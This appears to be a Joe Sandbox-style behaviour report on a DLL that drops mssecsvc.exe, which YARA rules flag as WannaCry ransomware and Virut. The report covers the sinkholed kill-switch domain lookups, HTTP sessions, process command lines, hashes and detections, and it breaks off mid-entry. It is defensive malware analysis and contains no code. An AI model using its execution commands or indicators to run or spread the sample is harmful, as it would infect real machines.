07/20/22-17:54:40.097301 | UDP | 2811577 | ETPRO TROJAN Possible Virut DGA NXDOMAIN Responses (com) | 53 | 50121 | 8.8.8.8 | 192.168.2.4
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class
Jul 20, 2022 17:51:12.176393986 CEST | 192.168.2.4 | 8.8.8.8 | 0x6cab | Standard query (0) | www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com | A (IP address) | IN (0x0001)
Jul 20, 2022 17:54:08.365417957 CEST | 192.168.2.4 | 8.8.8.8 | 0xa53a | Standard query (0) | www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com | A (IP address) | IN (0x0001)
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class
Jul 20, 2022 17:51:12.196624041 CEST | 8.8.8.8 | 192.168.2.4 | 0x6cab | No error (0) | www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com | | 104.16.173.80 | A (IP address) | IN (0x0001)
Jul 20, 2022 17:51:12.196624041 CEST | 8.8.8.8 | 192.168.2.4 | 0x6cab | No error (0) | www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com | | 104.17.244.81 | A (IP address) | IN (0x0001)
Jul 20, 2022 17:51:41.309281111 CEST | 8.8.8.8 | 192.168.2.4 | 0xe8fc | No error (0) | www-bing-com.dual-a-0001.a-msedge.net | dual-a-0001.a-msedge.net | | CNAME (Canonical name) | IN (0x0001)
Jul 20, 2022 17:51:41.309281111 CEST | 8.8.8.8 | 192.168.2.4 | 0xe8fc | No error (0) | dual-a-0001.a-msedge.net | | 204.79.197.200 | A (IP address) | IN (0x0001)
Jul 20, 2022 17:51:41.309281111 CEST | 8.8.8.8 | 192.168.2.4 | 0xe8fc | No error (0) | dual-a-0001.a-msedge.net | | 13.107.21.200 | A (IP address) | IN (0x0001)
Jul 20, 2022 17:54:08.385657072 CEST | 8.8.8.8 | 192.168.2.4 | 0xa53a | No error (0) | www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com | | 104.17.244.81 | A (IP address) | IN (0x0001)
Jul 20, 2022 17:54:08.385657072 CEST | 8.8.8.8 | 192.168.2.4 | 0xa53a | No error (0) | www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com | | 104.16.173.80 | A (IP address) | IN (0x0001)
• www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
0 | 192.168.2.4 | 49756 | 104.16.173.80 | 80 | C:\Windows\mssecsvc.exe
Timestamp | kBytes transferred | Direction | Data
Jul 20, 2022 17:51:12.245254993 CEST | 1011 | OUT | GET / HTTP/1.1
Host: www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com
Cache-Control: no-cache
Jul 20, 2022 17:51:12.277767897 CEST | 1012 | IN | HTTP/1.1 200 OK
Date: Wed, 20 Jul 2022 15:51:12 GMT
Content-Type: text/html
Content-Length: 607
Connection: close
Server: cloudflare
CF-RAY: 72dcdb5d9c7e9ba6-FRA
Data Ascii: <!DOCTYPE html><html lang="en-us" class="no-js"><head><meta charset="utf-8"><title>Sinkholed by Kryptos Logic</title><meta name="description" content="Kryptos Logic Sinkhole"><meta name="viewport" content="width=device-width, initial-scale=1.0"><link href="//static.kryptoslogicsinkhole.com/style.css" rel="stylesheet" type="text/css"/></head><body class="flat"><div class="content"><div class="content-box"><div class="big-content"><div class="clear"></div></div><h1>Sinkholed!</h1><p>This domain has been sinkholed by <a href="https://www.kryptoslogic.com">Kryptos Logic</a>.</p></div></div></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
1 | 192.168.2.4 | 49792 | 104.17.244.81 | 80 | C:\Windows\mssecsvc.exe
Timestamp | kBytes transferred | Direction | Data
Jul 20, 2022 17:54:08.444561958 CEST | 17314 | OUT | GET / HTTP/1.1
Host: www.iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea.com
Cache-Control: no-cache
Jul 20, 2022 17:54:08.478476048 CEST | 17315 | IN | HTTP/1.1 200 OK
Date: Wed, 20 Jul 2022 15:54:08 GMT
Content-Type: text/html
Content-Length: 607
Connection: close
Server: cloudflare
CF-RAY: 72dcdfaacf3c9046-FRA
Data Ascii: <!DOCTYPE html><html lang="en-us" class="no-js"><head><meta charset="utf-8"><title>Sinkholed by Kryptos Logic</title><meta name="description" content="Kryptos Logic Sinkhole"><meta name="viewport" content="width=device-width, initial-scale=1.0"><link href="//static.kryptoslogicsinkhole.com/style.css" rel="stylesheet" type="text/css"/></head><body class="flat"><div class="content"><div class="content-box"><div class="big-content"><div class="clear"></div></div><h1>Sinkholed!</h1><p>This domain has been sinkholed by <a href="https://www.kryptoslogic.com">Kryptos Logic</a>.</p></div></div></body></html>



Target ID: 0
Start time: 17:51:01
Start date: 20/07/2022
Path: C:\Windows\System32\loaddll32.exe
Wow64 process (32bit): true
Commandline: loaddll32.exe "C:\Users\user\Desktop\FjYNZSPNkt.dll"
Imagebase: 0xd90000
File size: 116736 bytes
MD5 hash: 7DEB5DB86C0AC789123DEC286286B938
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high

Target ID: 1
Start time: 17:51:02
Start date: 20/07/2022
Path: C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit): true
Commandline: cmd.exe /C rundll32.exe "C:\Users\user\Desktop\FjYNZSPNkt.dll",#1
Imagebase: 0x1190000
File size: 232960 bytes
MD5 hash: F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high

Target ID: 2
Start time: 17:51:03
Start date: 20/07/2022
Path: C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit): true
Commandline: rundll32.exe C:\Users\user\Desktop\FjYNZSPNkt.dll,PlayGame
Imagebase: 0xc20000
File size: 61952 bytes
                                                                              MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Reputation:high

                                                                              Target ID:3
                                                                              Start time:17:51:03
                                                                              Start date:20/07/2022
                                                                              Path:C:\Windows\SysWOW64\rundll32.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:rundll32.exe "C:\Users\user\Desktop\FjYNZSPNkt.dll",#1
                                                                              Imagebase:0xc20000
                                                                              File size:61952 bytes
                                                                              MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Reputation:high

                                                                              Target ID:4
                                                                              Start time:17:51:04
                                                                              Start date:20/07/2022
                                                                              Path:C:\Windows\mssecsvc.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:C:\WINDOWS\mssecsvc.exe
                                                                              Imagebase:0x400000
                                                                              File size:3751936 bytes
                                                                              MD5 hash:D6F23DCB793C969936142BF9B4F53837
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Yara matches:
                                                                              • Rule: JoeSecurity_Virut, Description: Yara detected Virut, Source: 00000004.00000002.665288410.0000000000A6B000.00000040.00000001.01000000.00000004.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_Wannacry, Description: Yara detected Wannacry ransomware, Source: 00000004.00000000.263630110.000000000040F000.00000008.00000001.01000000.00000004.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_Wannacry, Description: Yara detected Wannacry ransomware, Source: 00000004.00000000.267296098.000000000040F000.00000008.00000001.01000000.00000004.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_Wannacry, Description: Yara detected Wannacry ransomware, Source: 00000004.00000000.261950970.000000000040F000.00000008.00000001.01000000.00000004.sdmp, Author: Joe Security
                                                                              • Rule: wanna_cry_ransomware_generic, Description: detects wannacry ransomware on disk and in virtual page, Source: 00000004.00000000.263749691.0000000000710000.00000080.00000001.01000000.00000004.sdmp, Author: us-cert code analysis team
                                                                              • Rule: JoeSecurity_Virut, Description: Yara detected Virut, Source: 00000004.00000002.665390921.0000000000B90000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: wanna_cry_ransomware_generic, Description: detects wannacry ransomware on disk and in virtual page, Source: 00000004.00000000.265483719.0000000000710000.00000080.00000001.01000000.00000004.sdmp, Author: us-cert code analysis team
                                                                              • Rule: JoeSecurity_Wannacry, Description: Yara detected Wannacry ransomware, Source: 00000004.00000000.265422211.000000000040F000.00000008.00000001.01000000.00000004.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_Virut, Description: Yara detected Virut, Source: 00000004.00000002.667969815.000000007FEA0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_Wannacry, Description: Yara detected Wannacry ransomware, Source: 00000004.00000002.663379016.000000000040F000.00000008.00000001.01000000.00000004.sdmp, Author: Joe Security
                                                                              • Rule: wanna_cry_ransomware_generic, Description: detects wannacry ransomware on disk and in virtual page, Source: 00000004.00000000.267432086.0000000000710000.00000080.00000001.01000000.00000004.sdmp, Author: us-cert code analysis team
                                                                              • Rule: WannaCry_Ransomware, Description: Detects WannaCry Ransomware, Source: C:\Windows\mssecsvc.exe, Author: Florian Roth (with the help of binar.ly)
                                                                              • Rule: WannaCry_Ransomware_Gen, Description: Detects WannaCry Ransomware, Source: C:\Windows\mssecsvc.exe, Author: Florian Roth (based on rule by US CERT)
                                                                              • Rule: JoeSecurity_Wannacry, Description: Yara detected Wannacry ransomware, Source: C:\Windows\mssecsvc.exe, Author: Joe Security
                                                                              • Rule: wanna_cry_ransomware_generic, Description: detects wannacry ransomware on disk and in virtual page, Source: C:\Windows\mssecsvc.exe, Author: us-cert code analysis team
                                                                              • Rule: Win32_Ransomware_WannaCry, Description: unknown, Source: C:\Windows\mssecsvc.exe, Author: ReversingLabs
                                                                              Antivirus matches:
                                                                              • Detection: 100%, Avira
                                                                              • Detection: 100%, Joe Sandbox ML
                                                                              • Detection: 97%, ReversingLabs
                                                                              Reputation:low

                                                                              Target ID:5
                                                                              Start time:17:51:06
                                                                              Start date:20/07/2022
                                                                              Path:C:\Windows\SysWOW64\rundll32.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:rundll32.exe "C:\Users\user\Desktop\FjYNZSPNkt.dll",PlayGame
                                                                              Imagebase:0xc20000
                                                                              File size:61952 bytes
                                                                              MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Reputation:high

                                                                              Target ID:6
                                                                              Start time:17:51:07
                                                                              Start date:20/07/2022
                                                                              Path:C:\Windows\mssecsvc.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:C:\WINDOWS\mssecsvc.exe
                                                                              Imagebase:0x400000
                                                                              File size:3751936 bytes
                                                                              MD5 hash:D6F23DCB793C969936142BF9B4F53837
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Yara matches:
                                                                              • Rule: wanna_cry_ransomware_generic, Description: detects wannacry ransomware on disk and in virtual page, Source: 00000006.00000000.272335422.0000000000710000.00000080.00000001.01000000.00000004.sdmp, Author: us-cert code analysis team
                                                                              • Rule: JoeSecurity_Wannacry, Description: Yara detected Wannacry ransomware, Source: 00000006.00000000.266941602.000000000040F000.00000008.00000001.01000000.00000004.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_Wannacry, Description: Yara detected Wannacry ransomware, Source: 00000006.00000000.274690512.000000000040F000.00000008.00000001.01000000.00000004.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_Wannacry, Description: Yara detected Wannacry ransomware, Source: 00000006.00000000.272255673.000000000040F000.00000008.00000001.01000000.00000004.sdmp, Author: Joe Security
                                                                              • Rule: wanna_cry_ransomware_generic, Description: detects wannacry ransomware on disk and in virtual page, Source: 00000006.00000002.357943271.0000000000710000.00000080.00000001.01000000.00000004.sdmp, Author: us-cert code analysis team
                                                                              Reputation:low

                                                                              Target ID:7
                                                                              Start time:17:51:08
                                                                              Start date:20/07/2022
                                                                              Path:C:\Windows\System32\winlogon.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:winlogon.exe
                                                                              Imagebase:0x7ff775840000
                                                                              File size:677376 bytes
                                                                              MD5 hash:F9017F2DC455AD373DF036F5817A8870
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Yara matches:
                                                                              • Rule: JoeSecurity_Virut, Description: Yara detected Virut, Source: 00000007.00000002.784858660.000000007FFD0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_Virut, Description: Yara detected Virut, Source: 00000007.00000000.280733139.000000007FFD0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_Virut, Description: Yara detected Virut, Source: 00000007.00000000.280760913.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_Virut, Description: Yara detected Virut, Source: 00000007.00000000.270789242.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                                              Reputation:moderate

                                                                              Target ID:9
                                                                              Start time:17:51:11
                                                                              Start date:20/07/2022
                                                                              Path:C:\Windows\System32\lsass.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:C:\Windows\system32\lsass.exe
                                                                              Imagebase:0x7ff765a60000
                                                                              File size:57976 bytes
                                                                              MD5 hash:317340CD278A374BCEF6A30194557227
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Yara matches:
                                                                              • Rule: JoeSecurity_Virut, Description: Yara detected Virut, Source: 00000009.00000000.275433265.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_Virut, Description: Yara detected Virut, Source: 00000009.00000002.784832443.000000007FFD0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_Virut, Description: Yara detected Virut, Source: 00000009.00000002.785185973.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                                              Reputation:moderate

                                                                              Target ID:11
                                                                              Start time:17:51:12
                                                                              Start date:20/07/2022
                                                                              Path:C:\Windows\mssecsvc.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:C:\WINDOWS\mssecsvc.exe -m security
                                                                              Imagebase:0x400000
                                                                              File size:3751936 bytes
                                                                              MD5 hash:D6F23DCB793C969936142BF9B4F53837
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Yara matches:
                                                                              • Rule: JoeSecurity_Virut, Description: Yara detected Virut, Source: 0000000B.00000002.388703492.0000000000A80000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: wanna_cry_ransomware_generic, Description: detects wannacry ransomware on disk and in virtual page, Source: 0000000B.00000000.278856067.0000000000710000.00000080.00000001.01000000.00000004.sdmp, Author: us-cert code analysis team
                                                                              • Rule: JoeSecurity_Virut, Description: Yara detected Virut, Source: 0000000B.00000002.388561725.0000000000A6B000.00000040.00000001.01000000.00000004.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_Wannacry, Description: Yara detected Wannacry ransomware, Source: 0000000B.00000002.384391046.000000000040F000.00000008.00000001.01000000.00000004.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_Wannacry, Description: Yara detected Wannacry ransomware, Source: 0000000B.00000000.278777531.000000000040F000.00000008.00000001.01000000.00000004.sdmp, Author: Joe Security
                                                                              Reputation:low

                                                                              Target ID:12
                                                                              Start time:17:51:13
                                                                              Start date:20/07/2022
                                                                              Path:C:\Windows\System32\fontdrvhost.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:fontdrvhost.exe
                                                                              Imagebase:0x7ff6e3c70000
                                                                              File size:790304 bytes
                                                                              MD5 hash:31113981180E69C2773BCADA4051738A
                                                                              Has elevated privileges:false
                                                                              Has administrator privileges:false
                                                                              Programmed in:C, C++ or other language
                                                                              Yara matches:
                                                                              • Rule: JoeSecurity_Virut, Description: Yara detected Virut, Source: 0000000C.00000002.784858957.000000007FFD0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_Virut, Description: Yara detected Virut, Source: 0000000C.00000002.785409783.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_Virut, Description: Yara detected Virut, Source: 0000000C.00000000.296758568.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_Virut, Description: Yara detected Virut, Source: 0000000C.00000000.280492982.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_Virut, Description: Yara detected Virut, Source: 0000000C.00000000.296737411.000000007FFD0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security

                                                                              Target ID:13
                                                                              Start time:17:51:14
                                                                              Start date:20/07/2022
                                                                              Path:C:\Windows\System32\fontdrvhost.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:fontdrvhost.exe
                                                                              Imagebase:0x7ff6e3c70000
                                                                              File size:790304 bytes
                                                                              MD5 hash:31113981180E69C2773BCADA4051738A
                                                                              Has elevated privileges:false
                                                                              Has administrator privileges:false
                                                                              Programmed in:C, C++ or other language
                                                                              Yara matches:
                                                                              • Rule: JoeSecurity_Virut, Description: Yara detected Virut, Source: 0000000D.00000002.785329108.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_Virut, Description: Yara detected Virut, Source: 0000000D.00000002.784858398.000000007FFD0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_Virut, Description: Yara detected Virut, Source: 0000000D.00000000.283233215.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_Virut, Description: Yara detected Virut, Source: 0000000D.00000000.298581179.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_Virut, Description: Yara detected Virut, Source: 0000000D.00000000.298527592.000000007FFD0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security

                                                                              Target ID:14
                                                                              Start time:17:51:16
                                                                              Start date:20/07/2022
                                                                              Path:C:\Windows\System32\svchost.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
                                                                              Imagebase:0x7ff7338d0000
                                                                              File size:51288 bytes
                                                                              MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language

                                                                              Target ID:15
                                                                              Start time:17:51:17
                                                                              Start date:20/07/2022
                                                                              Path:C:\Windows\System32\svchost.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:c:\windows\system32\svchost.exe -k dcomlaunch -p -s PlugPlay
                                                                              Imagebase:0x7ff7338d0000
                                                                              File size:51288 bytes
                                                                              MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Yara matches:
                                                                              • Rule: JoeSecurity_Virut, Description: Yara detected Virut, Source: 0000000F.00000002.784858800.000000007FFD0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_Virut, Description: Yara detected Virut, Source: 0000000F.00000002.785379244.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_Virut, Description: Yara detected Virut, Source: 0000000F.00000000.300859546.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_Virut, Description: Yara detected Virut, Source: 0000000F.00000000.290186231.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_Virut, Description: Yara detected Virut, Source: 0000000F.00000000.300842077.000000007FFD0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security

                                                                              Target ID:16
                                                                              Start time:17:51:21
                                                                              Start date:20/07/2022
                                                                              Path:C:\Windows\System32\svchost.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:C:\Windows\system32\svchost.exe -k DcomLaunch -p
                                                                              Imagebase:0x7ff7338d0000
                                                                              File size:51288 bytes
                                                                              MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Yara matches:
                                                                              • Rule: JoeSecurity_Virut, Description: Yara detected Virut, Source: 00000010.00000000.302543511.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_Virut, Description: Yara detected Virut, Source: 00000010.00000000.297399320.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_Virut, Description: Yara detected Virut, Source: 00000010.00000000.302520549.000000007FFD0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_Virut, Description: Yara detected Virut, Source: 00000010.00000002.785307990.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_Virut, Description: Yara detected Virut, Source: 00000010.00000002.784853909.000000007FFD0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security

                                                                              Target ID:17
                                                                              Start time:17:51:21
                                                                              Start date:20/07/2022
                                                                              Path:C:\Windows\System32\svchost.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:c:\windows\system32\svchost.exe -k localservice -p -s CDPSvc
                                                                              Imagebase:0x7ff7338d0000
                                                                              File size:51288 bytes
                                                                              MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:false
                                                                              Programmed in:C, C++ or other language

                                                                              Target ID:18
                                                                              Start time:17:51:22
                                                                              Start date:20/07/2022
                                                                              Path:C:\Windows\System32\BackgroundTransferHost.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:"BackgroundTransferHost.exe" -ServerName:BackgroundTransferHost.1
                                                                              Imagebase:0x7ff62dce0000
                                                                              File size:36864 bytes
                                                                              MD5 hash:02BA81746B929ECC9DB6665589B68335
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:false
                                                                              Programmed in:C, C++ or other language

                                                                              Target ID:19
                                                                              Start time:17:51:22
                                                                              Start date:20/07/2022
                                                                              Path:C:\Windows\System32\svchost.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:c:\windows\system32\svchost.exe -k networkservice -p -s DoSvc
                                                                              Imagebase:0x7ff7338d0000
                                                                              File size:51288 bytes
                                                                              MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:false
                                                                              Programmed in:C, C++ or other language

                                                                              Target ID:20
                                                                              Start time:17:51:23
                                                                              Start date:20/07/2022
                                                                              Path:C:\Windows\System32\svchost.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:C:\Windows\System32\svchost.exe -k NetworkService -p
                                                                              Imagebase:0x7ff7338d0000
                                                                              File size:51288 bytes
                                                                              MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:false
                                                                              Programmed in:C, C++ or other language

                                                                              Target ID:21
                                                                              Start time:17:51:25
                                                                              Start date:20/07/2022
                                                                              Path:C:\Windows\System32\SgrmBroker.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:C:\Windows\system32\SgrmBroker.exe
                                                                              Imagebase:0x7ff7b2bb0000
                                                                              File size:163336 bytes
                                                                              MD5 hash:D3170A3F3A9626597EEE1888686E3EA6
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language

                                                                              Target ID:22
                                                                              Start time:17:51:25
                                                                              Start date:20/07/2022
                                                                              Path:C:\Windows\System32\svchost.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:c:\windows\system32\svchost.exe -k localservicenetworkrestricted -p -s wscsvc
                                                                              Imagebase:0x7ff7338d0000
                                                                              File size:51288 bytes
                                                                              MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:false
                                                                              Programmed in:C, C++ or other language

                                                                              Target ID:23
                                                                              Start time:17:51:26
                                                                              Start date:20/07/2022
                                                                              Path:C:\Windows\System32\svchost.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:c:\windows\system32\svchost.exe -k unistacksvcgroup
                                                                              Imagebase:0x7ff7338d0000
                                                                              File size:51288 bytes
                                                                              MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language

                                                                              Target ID:24
                                                                              Start time:17:51:27
                                                                              Start date:20/07/2022
                                                                              Path:C:\Windows\System32\svchost.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:c:\windows\system32\svchost.exe -k rpcss -p
                                                                              Imagebase:0x7ff7338d0000
                                                                              File size:51288 bytes
                                                                              MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:false
                                                                              Programmed in:C, C++ or other language
                                                                              Yara matches:
                                                                              • Rule: JoeSecurity_Virut, Description: Yara detected Virut, Source: 00000018.00000000.314054124.000000007FFD0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_Virut, Description: Yara detected Virut, Source: 00000018.00000002.785329413.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_Virut, Description: Yara detected Virut, Source: 00000018.00000000.310448882.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_Virut, Description: Yara detected Virut, Source: 00000018.00000002.784858725.000000007FFD0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security

                                                                              Target ID:25
                                                                              Start time:17:51:30
                                                                              Start date:20/07/2022
                                                                              Path:C:\Windows\System32\svchost.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                                                                              Imagebase:0x7ff7338d0000
                                                                              File size:51288 bytes
                                                                              MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language

                                                                              Target ID:26
                                                                              Start time:17:51:31
                                                                              Start date:20/07/2022
                                                                              Path:C:\Windows\System32\svchost.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:c:\windows\system32\svchost.exe -k dcomlaunch -p -s LSM
                                                                              Imagebase:0x7ff7338d0000
                                                                              File size:51288 bytes
                                                                              MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Yara matches:
                                                                              • Rule: JoeSecurity_Virut, Description: Yara detected Virut, Source: 0000001A.00000000.319687483.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_Virut, Description: Yara detected Virut, Source: 0000001A.00000002.785023367.000000007FFD0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_Virut, Description: Yara detected Virut, Source: 0000001A.00000000.319657354.000000007FFD0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security

                                                                              Target ID:27
                                                                              Start time:17:51:32
                                                                              Start date:20/07/2022
                                                                              Path:C:\Windows\System32\dwm.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:dwm.exe
                                                                              Imagebase:0x7ff7aa950000
                                                                              File size:62464 bytes
                                                                              MD5 hash:70073A05B2B43FFB7A625708BB29E7C7
                                                                              Has elevated privileges:false
                                                                              Has administrator privileges:false
                                                                              Programmed in:C, C++ or other language
                                                                              Yara matches:
                                                                              • Rule: JoeSecurity_Virut, Description: Yara detected Virut, Source: 0000001B.00000000.321636086.000000007FFD0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_Virut, Description: Yara detected Virut, Source: 0000001B.00000000.321813327.000000007FFD0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_Virut, Description: Yara detected Virut, Source: 0000001B.00000002.785061929.000000007FFD0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_Virut, Description: Yara detected Virut, Source: 0000001B.00000000.321645741.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_Virut, Description: Yara detected Virut, Source: 0000001B.00000000.321842635.000000007FFF0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security

                                                                              Target ID:28
                                                                              Start time:17:51:41
                                                                              Start date:20/07/2022
